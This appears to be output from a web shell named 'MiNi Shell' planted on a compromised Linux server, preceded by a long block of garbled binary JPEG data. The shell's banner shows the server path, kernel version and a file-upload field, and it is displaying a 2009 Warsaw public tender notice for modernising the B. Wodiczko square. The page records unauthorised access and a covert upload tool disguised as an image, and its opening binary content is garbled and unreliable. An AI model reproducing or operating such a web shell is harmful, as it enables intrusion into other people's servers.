JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090810/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090810/130421-N-2009.html

<p class="kh_header"><b>Warszawa: Wykonanie modernizacji skweru B. Wodiczko w Warszawie.</b><br>
<b>Numer ogłoszenia: 130421 - 2009; data zamieszczenia: 10.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Terenów  Publicznych , ul. Jezuicka 1/3, 00-281 Warszawa, woj. mazowieckie, tel. 022 5568322, faks 022 5568373.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ztp.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie modernizacji skweru B. Wodiczko w Warszawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie modernizacji Skweru B. Wodiczko w Warszawie, które obejmuje wykonanie gospodarki drzewostanem, założenie trawników, wykonanie nasadzeń krzewów, dostarczenie oraz ustawienie elementów małej architektury, roboty drogowe, wykonanie oświetlenia. 
W zakres prac wchodzi m.in.:
- karczowanie krzewów 47,3 m2,
- karczowanie drzew 15 szt.
- wywóz drewna z karczowania oraz oczyszczenie terenu,
- sadzenie drzew liściastych 5 sztuk
- sadzenie krzewów żywopłotowych 256 sztuk
- ustawienie obrzeży metalowych do krzewów,
- wykonanie systemu napowietrzania i nawadniania z rur drenarskich
- osypka z grysu granitowego,
- sadzenie krzewów liściastych form naturalnych 135 sztuk
- sadzenie roślin okrywowych 3531 sztuk
- wykonanie umocnienia faszynowego skarp 66,4 m
- sadzenie bylin 4364 sztuki
- wykonanie trawników parkowych siewem na powierzchni 0,447 ha
- wykonanie łąk parkowych siewem na powierzchni 0,362 ha
- wzmocnienie trawnika systemem NETLON  lub równoważnym 91,31 m2,
- pielęgnacja w okresie gwarancyjnym
- rozbiórka istniejących nawierzchni,
- wykonanie nawierzchni z kostki kamiennej rzędowej na powierzchni 579,74 m2,
- wykonanie nawierzchni z płyt granitowych na powierzchni 891,81 m2,
- wykonanie nawierzchni z kostki ściętej na powierzchni 354,94 m2,
- wykonanie nawierzchni z kostki kamiennej granitowej (kolor szary) na powierzchni 285,98 m2,
- wykonanie nawierzchni z kostki kamiennej granitowej (kolor żółtawy) na powierzchni 205,94 m2,
- wykonanie nawierzchni z płyt betonowych na powierzchni 1019,09 m2,
- wykonanie nawierzchni z kostki łamanej na powierzchni 429,93 m2,
- wykonanie nawierzchni Hanse Grand bez podbudowy na powierzchni 2073  m2,
- wykonanie nawierzchni Hanse Grand z podbudową na powierzchni 276,19 m2,
- wykonanie nawierzchni żwirowej na powierzchni 150 m2,
- wykonanie nawierzchni elastycznej na powierzchni 222,67 m2,
- ustawienie obrzeży granitowych 703,24 m, Bordir lub równoważnych 301,08 m, elastycznych 132,93 m,
- montaż listew Cortem Steel 40,9 m i listew metalowych 30 m,
- dostawa oraz montaż ławek parkowych 29 szt, 
- dostawa oraz montaż koszy na śmieci 18 szt. i koszy na psie odchody 3 szt.,
- dostawa oraz montaż tablic informacyjnych 3 szt.,
- dostawa i montaż stojaków na rowery 7 szt.,
- dostawa i montaż płotka ogrodniczego 306,5 m,
- dostawa i montaż kratownic pod drzewa 2 szt.,
- dostawa i montaż ogrodzenia placu zabaw 21 szt.,
- dostawa i montaż piaskownicy 1 szt.
- demontaż istniejących słupów oświetleniowych 21 szt. i kabli 730 m,
- roboty związane z wykonaniem nowego oświetlenia (24 sztuki latarni + słupy 2 szt. z zawieszkami i oprawami po 2 sztuki na komplet 5 kompletów) w tym m.in. ułożenie rur ochronnych, montaż przepustów kablowych, montaż słupów oświetleniowych, opraw oświetleniowych, przewodów do opraw, ułożenie kabli, montaż tablic bezpiecznikowych.
Ze względu na okres w jakim będą wykonywane roboty - IV kwartał 2009 r. i możliwość wystąpienia w tym czasie niesprzyjających warunków atmosferycznych, wykonawca przy wycenie robót powinien uwzględnić możliwość ich wykonania nawet przy ujemnych temperaturach otoczenia poprzez zastosowanie namiotów i nagrzewnic dla zapewnienia kontynuowania i zakończenia prac.
Z uwagi na prowadzony remont Centrum Chopinowskiego, roboty drogowe będą etapowane w porozumieniu z wykonawcą remontu budowlanego, tak aby umożliwić dowóz materiałów i zakończenie prac w obiekcie.
Przedmiot zamówienia określa następująca dokumentacja:
-projekt wykonawczy stanowiący załączniki nr 9a, 9b, 9c, 9d, 9e, 9f do SIWZ
- specyfikacje techniczne wykonania i odbioru robót budowlanych i ogrodniczych
stanowiąca załącznik nr 10 a, 10 b ,10 c, 10d do SIWZ
- przedmiar robót stanowiący załącznik nr 8a, 8b, 8c, 8d, 8e do SIWZ

Gwarancja:
Wykonawca powinien udzielić na wykonane:
- roboty budowlano-montażowe, użyte materiały drogowe, słupy z wysięgnikami oświetleniowe - gwarancji na okres 60 miesięcy
- elementy małej architektury (ławki, kosze na śmieci, kosze na psie odchody - gwarancji na okres 24 miesiące
- kable oświetleniowe i oprawy oświetleniowe - gwarancji na okres 12 miesięcy
- roboty ogrodnicze oraz materiał roślinny - gwarancji na okres 12 miesięcy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.10-5, 45.11.12.00-0, 29.83.50.00-1, 45.31.61.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 70.000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.1. nie podlegają wykluczeniu z przedmiotowego postępowania  na  podstawie art. 24 ust. 1  ustawy;
1.2. spełniają warunki określone w art. 22 ust. 1 pkt. 1-3 ustawy oraz spełniają warunki dodatkowe:
1.2.1.	posiadają uprawnienia niezbędne do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
1.2.1.1.	posiadają uprawnienie do występowania jako podmiot gospodarczy w zakresie objętym niniejszym zamówieniem,
1.2.2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
1.2.2.1.	wykażą, iż w okresie ostatnich 5 lat do dnia wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności  jest krótszy - w tym okresie,  należycie wykonali:
- minimum dwa zamówienia dotyczące wykonania robót drogowych, z których jedno obejmuje wykonanie nawierzchni chodników z elementów betonowych (płyt betonowych, kostki betonowej) drugie wykonanie nawierzchni chodników  z elementów kamiennych (płyt kamiennych, kostki kamiennej) wraz z ustawieniem obrzeży betonowych lub kamiennych na powierzchni minimum 1000 m2 każde z zamówień.
- minimum jedno zamówienie dotyczące wykonania robót drogowych, które obejmuje wykonanie nawierzchni przepuszczalnych typu Hanse Grande na powierzchni minimum 500 m2 
- minimum jedno zamówienie dotyczące wykonania robót drogowych, które obejmuje wykonanie nawierzchni elastycznych na powierzchni minimum 50 m2,
- minimum dwa zamówienia dotyczące wykonania robót ogrodniczych, z których każde obejmuje  posadzenie krzewów i/lub roślin okrywowych minimum 1.000 sztuk i zakładanie trawników minimum 2500 m2,
- minimum dwa zamówienia dotyczące realizacji oświetlenia w tym co najmniej jedno winno dotyczyć dostarczenia oraz montażu minimum 10 latarni (słupy i oprawy) wraz z układaniem linii kablowych.
Zrealizowane zamówienia należy wykazać wg zał. nr 4 do SIWZ..
1.2.2.2.	wykażą, iż  dysponują kadrą techniczną do wykonania zamówienia, tzn:
- 1 osobą z uprawnieniami budowlanymi w specjalności drogowej, pełniącą funkcję kierownika budowy
-1 osobą pełniącą funkcję kierownika robót elektrycznych posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych 
- 1 osobą pełniącą funkcję kierownika robót ogrodniczych posiadającą tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów ogrodniczych lub architektury krajobrazu
Wykaz kadry technicznej należy przedstawić wg zał. nr 5 do SIWZ.
1.2.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
1.2.3.1.	udokumentują osiągnięcie, w okresie ostatnich 3 lat obrotowych tj. od 2006 r., a jeżeli okres prowadzenia działalności  jest krótszy - za ten okres, przychodu ze sprzedaży produktów (dla wykonawców prowadzących pełną księgowość) lub przychodu z działalności (dla wykonawców niezobowiązanych do sporządzania bilansu) min. łącznie w ww. okresie 9.400.000,00 zł., wg zał. nr 6a i 6b do SIWZ.
1.2.4.       wniosą wadium w wymaganym terminie, wysokości i formie..
Uwaga:
Złożenie przez wykonawcę w ofercie dokumentów i oświadczeń niżej wymienionych 
będzie stanowiło podstawę do oceny spełnienia warunków udziału w postępowaniu. Zamawiający ustali na podstawie  treści tych dokumentów  i  oświadczeń czy wykonawca spełnia wszystkie wyżej wymienione warunki, stosując zasadę spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.1.	Oświadczenia oraz dokumenty potwierdzające spełnianie warunków:
1.1.1.	Oświadczenie o niepodleganiu  wykluczeniu z przedmiotowego postępowania na podstawie art. 24 ust. 1  w związku z art. 22 ust. 1 pkt 4 ustawy - wg wzoru określonego w załączniku Nr 2 do SIWZ
1.1.2.	Oświadczenie o spełnieniu warunków określonych w art. 22 ust.1 pkt 1-3 ustawy -wg wzoru określonego w załączniku Nr 3 do SIWZ.
1.1.3.	Dokument potwierdzający dopuszczenie wykonawcy do obrotu prawnego 
w zakresie objętym zamówieniem - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie  wcześniej  niż 6 miesięcy przed upływem terminu składania ofert (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę).
1.1.4.	Aktualne zaświadczenie  właściwego naczelnika Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę).
1.1.5.	Aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego  potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę).
1.1.6.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym art. 24 ust. 1 pkt. 4 - 8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę).
1.1.7.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym 
w art. 24 ust. 1 pkt 9 ustawy wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę).
1.1.8.	Potwierdzenie wniesienia wadium,
1.1.9.	Wykaz zamówień - wg wzoru stanowiącego załącznik Nr 4 do SIWZ.
	Do wykazu należy dołączyć dokumenty potwierdzające, że zamówienia zostały wykonane należycie.
1.1.10.	Wykaz osób,- wg wzoru stanowiącego załącznik Nr 5 do SIWZ.
Do wykazu należy dołączyć kopie uprawnień budowlanych i zaświadczeń o członkostwie w Izbie Inżynierów Budownictwa poświadczonych za zgodność z oryginałem przez wykonawcę.
Do wykazu należy załączyć, o ile zachodzi taka okoliczność, pisemne zobowiązanie innych podmiotów do udostępnienia osób wymienionych w wykazie.
1.1.11.	Informacja finansowa wraz z dokumentami wymienionymi w załączniku (w formie oryginałów lub kopii poświadczonych za zgodność z oryginałem przez wykonawcę) potwierdzającymi dane finansowe - wg wzoru stanowiącego załącznik Nr 6a i  6b do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ztp.waw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Jezuicka 1/3 Warszawa
Cena formularza SIWZ - 500,00 zł.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.08.2009 godzina 10:00, miejsce: Zarząd Terenów Publicznych ul. Jezuicka 1/3, 00-281 Warszawa, sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com